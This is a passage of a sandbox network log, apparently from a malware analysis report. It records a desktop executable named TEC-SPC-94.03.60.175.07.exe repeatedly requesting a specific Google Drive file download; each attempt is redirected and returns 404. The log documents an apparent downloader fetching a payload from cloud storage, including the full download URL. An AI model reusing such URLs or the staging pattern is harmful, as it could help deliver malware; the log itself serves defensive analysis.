                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:56 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6YjTfEhJPw5sAKvMfpolIKVBDRw9THWaXRxGVwARYJ6R9XQq_eY1_y9ju61236nCzP
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:56 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-VixMaL7CJ91CD6gpyAhnKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:56 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dQ-YHKVhhu5AxqZuGlxUtw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        30 | 192.168.2.6 | 49995 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:58 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:59 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:59 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-faXNLTJX9kGuHEP2A5EK7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        31 | 192.168.2.6 | 50001 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:01 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:02 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6YkRbkhsPgabLfwdRj3a0Um4M52cmg7s82KXAxASjBrJiR_diGnEX1gQ-BMAsVi5rA
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:01 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-gIhWpheFdd3bBCoyhR1Wvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:02 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="F02VpmlkErNcAw4oHVNGvg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        32 | 192.168.2.6 | 50008 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:04 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-aLr2Qz8GvadAU6Y2w5nDmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        33 | 192.168.2.6 | 50014 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:06 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:07 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6n--IN87so5snPV0lzFrTxOgZ3H-N-WcX8BWY7oqvmqyjaiOFvT-ucHkMPrltomvT9
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:07 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-y3DZUCCGOp_7mkiYWAKEuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:07 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y7PaTqXAZ9oCp5gOeba3jg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        34 | 192.168.2.6 | 50022 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:09 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:10 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ZYRI-tJcfKSRkO3W2x2JVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        35 | 192.168.2.6 | 50028 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:12 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:13 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4WtiB1oje2811J_yZ9tVZUUwQnGXJ6W4T96k0HN-gBOEZlQMKOQ8rvcBNam8DI121K
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:12 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-OoBlue0n3HAxx7RpMXxZNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:13 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VyutQ3fWk2h-eN1Z_lOqXA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        36 | 192.168.2.6 | 50029 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:14 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-Qx2DywhPpgs4cXlOvPXrCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        37 | 192.168.2.6 | 50030 | 142.250.181.1 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:17 UTC | 460 | OUT | GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:59:18 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6rInwiGldG2Eu4HdI1VJvgvpuwtGPGOCfVZD7iFbmBHqwSKXW5jpW_K4izTliwLvdR
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:18 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-NCCqdR7YFhYK_Uln0jJpgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:18 UTC | 1652 | IN
